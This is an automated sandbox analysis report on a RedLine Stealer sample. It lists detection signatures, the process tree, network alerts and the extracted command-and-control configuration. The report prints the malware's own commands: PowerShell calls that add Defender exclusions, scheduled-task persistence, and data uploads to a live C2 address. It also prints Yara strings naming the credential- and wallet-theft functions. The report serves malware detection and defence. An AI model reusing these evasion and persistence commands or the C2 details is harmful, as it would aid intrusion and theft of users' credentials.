Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RgIbrhxoEx.exe

Overview

General Information

Sample name:RgIbrhxoEx.exe
renamed because original name is a hash value
Original sample name:304ea6d5cf3786d19de14f004d7d057a.exe
Analysis ID:1483367
MD5:304ea6d5cf3786d19de14f004d7d057a
SHA1:d86ddb3becc0a82c915be35e7a7dcd796b50c269
SHA256:89dd158d0ffdb6d661672343d36f5a87907e1cc60a0e9e85c892f75228eb399b
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • RgIbrhxoEx.exe (PID: 5440 cmdline: "C:\Users\user\Desktop\RgIbrhxoEx.exe" MD5: 304EA6D5CF3786D19DE14F004D7D057A)
    • powershell.exe (PID: 5532 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7204 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 5656 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RgIbrhxoEx.exe (PID: 3620 cmdline: "C:\Users\user\Desktop\RgIbrhxoEx.exe" MD5: 304EA6D5CF3786D19DE14F004D7D057A)
      • conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • LjGABleGAy.exe (PID: 1880 cmdline: C:\Users\user\AppData\Roaming\LjGABleGAy.exe MD5: 304EA6D5CF3786D19DE14F004D7D057A)
    • schtasks.exe (PID: 7388 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • LjGABleGAy.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Roaming\LjGABleGAy.exe" MD5: 304EA6D5CF3786D19DE14F004D7D057A)
      • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.57.151:55615"], "Bot Id": "cheat"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              Click to see the 17 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.RgIbrhxoEx.exe.3e22b60.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.RgIbrhxoEx.exe.3e22b60.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.RgIbrhxoEx.exe.3e22b60.3.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x117ca:$a4: get_ScannedWallets
                  • 0x10628:$a5: get_ScanTelegram
                  • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                  • 0xf26a:$a7: <Processes>k__BackingField
                  • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0xeb9e:$a9: <ScanFTP>k__BackingField
                  0.2.RgIbrhxoEx.exe.3e22b60.3.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0xe68a:$u7: RunPE
                  • 0x11d41:$u8: DownloadAndEx
                  • 0x7330:$pat14: , CommandLine:
                  • 0x11279:$v2_1: ListOfProcesses
                  • 0xe88b:$v2_2: get_ScanVPN
                  • 0xe92e:$v2_2: get_ScanFTP
                  • 0xf61e:$v2_2: get_ScanDiscord
                  • 0x1060c:$v2_2: get_ScanSteam
                  • 0x10628:$v2_2: get_ScanTelegram
                  • 0x106ce:$v2_2: get_ScanScreen
                  • 0x11416:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x11709:$v2_2: get_ScanBrowsers
                  • 0x117ca:$v2_2: get_ScannedWallets
                  • 0x117f0:$v2_2: get_ScanWallets
                  • 0x11810:$v2_3: GetArguments
                  • 0xfed9:$v2_4: VerifyUpdate
                  • 0x147ee:$v2_4: VerifyUpdate
                  • 0x11bca:$v2_5: VerifyScanRequest
                  • 0x112c6:$v2_6: GetUpdates
                  • 0x147cf:$v2_6: GetUpdates
                  10.2.LjGABleGAy.exe.4263440.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    Click to see the 31 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RgIbrhxoEx.exe", ParentImage: C:\Users\user\Desktop\RgIbrhxoEx.exe, ParentProcessId: 5440, ParentProcessName: RgIbrhxoEx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", ProcessId: 5532, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RgIbrhxoEx.exe", ParentImage: C:\Users\user\Desktop\RgIbrhxoEx.exe, ParentProcessId: 5440, ParentProcessName: RgIbrhxoEx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", ProcessId: 5532, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, ParentImage: C:\Users\user\AppData\Roaming\LjGABleGAy.exe, ParentProcessId: 1880, ParentProcessName: LjGABleGAy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp", ProcessId: 7388, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RgIbrhxoEx.exe", ParentImage: C:\Users\user\Desktop\RgIbrhxoEx.exe, ParentProcessId: 5440, ParentProcessName: RgIbrhxoEx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", ProcessId: 5656, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\RgIbrhxoEx.exe", ParentImage: C:\Users\user\Desktop\RgIbrhxoEx.exe, ParentProcessId: 5440, ParentProcessName: RgIbrhxoEx.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe", ProcessId: 5532, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\RgIbrhxoEx.exe", ParentImage: C:\Users\user\Desktop\RgIbrhxoEx.exe, ParentProcessId: 5440, ParentProcessName: RgIbrhxoEx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp", ProcessId: 5656, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Suricata Signatures

                    Timestamp:2024-07-27T04:12:23.889248+0200
                    SID:2045000
                    Source Port:55615
                    Destination Port:49709
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T04:12:59.540993+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49719
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-27T04:12:18.578362+0200
                    SID:2849352
                    Source Port:49708
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T04:12:18.878917+0200
                    SID:2849662
                    Source Port:49709
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T04:12:27.258175+0200
                    SID:2045001
                    Source Port:55615
                    Destination Port:49709
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T04:12:20.154106+0200
                    SID:2848200
                    Source Port:49711
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T04:12:18.200600+0200
                    SID:2045001
                    Source Port:55615
                    Destination Port:49706
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T04:12:27.715047+0200
                    SID:2849352
                    Source Port:49718
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T04:12:14.694601+0200
                    SID:2045000
                    Source Port:55615
                    Destination Port:49706
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T04:12:09.597710+0200
                    SID:2849662
                    Source Port:49706
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T04:12:24.113320+0200
                    SID:2849351
                    Source Port:49709
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected
                    Timestamp:2024-07-27T04:12:21.374284+0200
                    SID:2022930
                    Source Port:443
                    Destination Port:49710
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:2024-07-27T04:12:14.910173+0200
                    SID:2849351
                    Source Port:49706
                    Destination Port:55615
                    Protocol:TCP
                    Classtype:Malware Command and Control Activity Detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.57.151:55615"], "Bot Id": "cheat"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeReversingLabs: Detection: 83%
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeVirustotal: Detection: 43%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: RgIbrhxoEx.exeReversingLabs: Detection: 83%
                    Source: RgIbrhxoEx.exeVirustotal: Detection: 43%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: RgIbrhxoEx.exeJoe Sandbox ML: detected
                    Source: RgIbrhxoEx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: RgIbrhxoEx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 4x nop then jmp 01327E61h0_2_01327375
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeCode function: 4x nop then jmp 01327E61h0_2_01327490
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 4x nop then jmp 03057329h10_2_0305683D
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeCode function: 4x nop then jmp 03057329h10_2_03056958

                    Networking

                    barindex
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: 185.222.57.151:55615
                    Uses known network protocols on non-standard ports
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49711
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49709
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                    Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                    Source: global trafficTCP traffic: 192.168.2.5:49706 -> 185.222.57.151:55615
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.151:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.151:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.151:55615Content-Length: 961769Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.151:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.151:55615Content-Length: 961761Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.57.151:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.57.151:55615Content-Length: 961280Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.57.151:55615Content-Length: 961272Expect: 100-continueAccept-Encoding: gzip, deflate
                    Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: unknownTCP traffic detected without corresponding DNS query: 185.222.57.151
                    Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                    Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.57.151:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000033BB000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003146000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002E91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.151:55615
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002C91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.151:55615/
                    Source: RgIbrhxoEx.exe, 00000008.00000002.2244863181.0000000003146000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://185.222.57.151:55615t-
                    Source: RgIbrhxoEx.exe, LjGABleGAy.exe.0.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
